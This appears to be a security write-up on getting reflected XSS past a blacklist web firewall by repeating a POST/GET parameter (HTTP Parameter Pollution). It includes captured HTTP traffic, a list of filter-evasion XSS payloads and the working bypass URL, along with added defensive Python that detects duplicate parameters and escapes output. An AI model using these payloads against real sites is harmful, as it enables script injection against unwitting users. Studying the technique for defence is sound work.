Original article: Bypassing XSS via HTTP Parameter Pollution
HTTP Parameter Pollution (HPP) overrides or adds HTTP GET/POST parameters by injecting query-string delimiters. In short, the attacker sends the same parameter several times in order to influence the application. The technique can also be used by specifying new, arbitrary parameters and adding them to the request. The server may merge the values of the duplicated parameter, or it may discard one of the two values. The following table summarizes the known behaviour of different web servers:
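To make the merge-or-discard behaviour concrete, here is an added example (not from the original article) that resolves a repeated parameter under four policies a server-side parser might apply. The policy names are labels chosen for this example, not any server's API, and the query string is constructed. The second function captures the condition that matters for security: a filter that resolves duplicates one way and a backend that resolves them another way are inspecting different values.

```python
# Added example, not code from the original article: simulate the ways a
# server-side parser may resolve a parameter that appears more than once.
from urllib.parse import parse_qsl


def resolve(query: str, policy: str) -> dict:
    """Collapse repeated parameters in `query` according to `policy`.

    policy: "first"  -> keep the first occurrence only
            "last"   -> keep the last occurrence only
            "concat" -> join every occurrence with a comma
            "all"    -> keep every occurrence as a list
    (policy names are this example's own labels, not a server's API)
    """
    values: dict = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        values.setdefault(name, []).append(value)
    if policy == "first":
        return {k: v[0] for k, v in values.items()}
    if policy == "last":
        return {k: v[-1] for k, v in values.items()}
    if policy == "concat":
        return {k: ",".join(v) for k, v in values.items()}
    if policy == "all":
        return dict(values)
    raise ValueError(f"unknown policy {policy!r}")


def views_disagree(query: str, inspector_policy: str, backend_policy: str) -> bool:
    """True when a front-end filter and the backend would see different values
    for the same request. That gap is what parameter pollution exploits, so a
    deployment should make both sides resolve duplicates identically (or reject
    duplicates outright)."""
    return resolve(query, inspector_policy) != resolve(query, backend_policy)


if __name__ == "__main__":
    q = "category=shoes&category=boots"  # constructed sample query string
    for p in ("first", "last", "concat", "all"):
        print(f"{p:>6}: {resolve(q, p)}")
    print("inspector(first) vs backend(concat) disagree:",
          views_disagree(q, "first", "concat"))
```

Run stand-alone it prints the four resolved views of the same query; the `views_disagree` check is the kind of assertion worth adding to a test suite when a WAF or reverse proxy sits in front of an application, since it fails exactly when the two components would read a polluted request differently.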
Requirements

Recently I was looking at an application that was vulnerable to XSS: it was possible to inject <, >, ", ;, etc., but a web application firewall (a blacklist) stripped HTML tags and attributes. The vulnerability was in the "category" parameter sent in a POST request to "search.htm":
```http
POST /search.htm HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 109

category=
```
As soon as any kind of HTML tag was supplied in the category parameter, the application redirected the user to an error page on somesite:

```http
HTTP/1.1 302 Moved Temporarily
Date: Tue, 03 Sep 2013 02:12:58 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA/Tomcat-5.5
Content-Length: 0
Location: https://www.somesite.com/error.html?code=OWASP
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
```
POST to GET
The request could simply be changed from a POST to a GET. Unfortunately, changing the request method alone did not get past the filter, but the application accepted it, which made exploitation easier.
Traditional bypasses
First, I fuzzed the parameter with the standard filter-evasion techniques. Here is the list of everything that was blocked:
```text
"onclick
"ondblclick
"onmousedown
"onmousemove
"onmouseover
"onmouseout
"onmouseup
"onkeydown
"onkeypress
"onkeyup
"onabort
"onerror
"onload
"onresize
"onscroll
"onunload
"onsubmit
"onblur
"onchange
"onfocus
"onreset
"onselect
"><ScRiPt>
"><SCRIPT>
"><script//
"><script/**/
"><script+
"><script%20
"><script
"><%73%63%72%69%70%74>
"><<script>>
"><s/**/c/**/r/**/i/**/p/**/t>
"><s//c//r//i//p//t>
"><s+c+r+i+p+t>
"><s%20c%20r%20i%20p%20t>
"><%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74>
<object
<div
<img
<a
```
HPP bypass
As you may have guessed, simply specifying the category parameter twice bypassed the firewall completely. The firewall ignored the second instance of the parameter, while the server then combined the two parameters, which allowed the script to be injected!
The resulting URL:

```text
search.htm?category=&category="><script>alert('reflected%20xss')</script>
```
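A defensive counterpart to the bypass above, added here as an example and not part of the original article: the check flags any request in which a parameter name is repeated, runs the blacklist over every occurrence of a parameter rather than only the first (the gap the firewall above fell into), and HTML-encodes the reflected value, which neutralises the payload regardless of how the parameters were merged. The blacklist pattern, the function names and the first two sample URLs are this example's own; the third sample is the article's own bypass URL.

```python
# Added example, not code from the original article. Demonstrates three
# defender-side measures against the HPP bypass described in the text.
import html
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed, deliberately small blacklist in the spirit of the one the
# article describes: a tag opener or an on*= event-handler attribute.
BLOCKED = re.compile(r"<\s*/?\s*[a-z]|\bon[a-z]+\s*=", re.IGNORECASE)


def inspect_url(url: str) -> dict:
    """Examine a request URL and decide whether it should be served.

    Returns a dict with:
      duplicates - parameter names that appear more than once (HPP signal)
      blocked    - parameter names where *any* occurrence trips the blacklist
      allow      - True only if neither list is populated
    """
    seen: dict = {}
    duplicates: set = set()
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name in seen:
            duplicates.add(name)
        seen.setdefault(name, []).append(value)
    # Check every value, not just the first: a filter that inspects only one
    # instance is exactly what a duplicated parameter slips past.
    blocked = {n for n, vals in seen.items() if any(BLOCKED.search(v) for v in vals)}
    return {
        "duplicates": sorted(duplicates),
        "blocked": sorted(blocked),
        "allow": not duplicates and not blocked,
    }


def reflect_safely(value: str) -> str:
    """Encode a value for insertion into an HTML text or attribute context.

    This is the control that holds even if the filter is bypassed, because the
    browser never sees the raw < > " ' characters.
    """
    return html.escape(value, quote=True)


# Constructed sample requests; the last one is the article's own bypass URL.
SAMPLES = [
    "/search.htm?category=shoes",
    "/search.htm?category=\"><script>alert(1)</script>",
    "/search.htm?category=&category=\"><script>alert('reflected%20xss')</script>",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(url, "->", inspect_url(url))
    print(reflect_safely("\"><script>alert(1)</script>"))
```

The duplicate-name check is the cheapest signal to log and alert on: legitimate forms rarely send the same field twice, so a repeated name in a request that also trips the blacklist is a strong indicator of exactly the probing described above. Output encoding remains the control that does not depend on the filter at all.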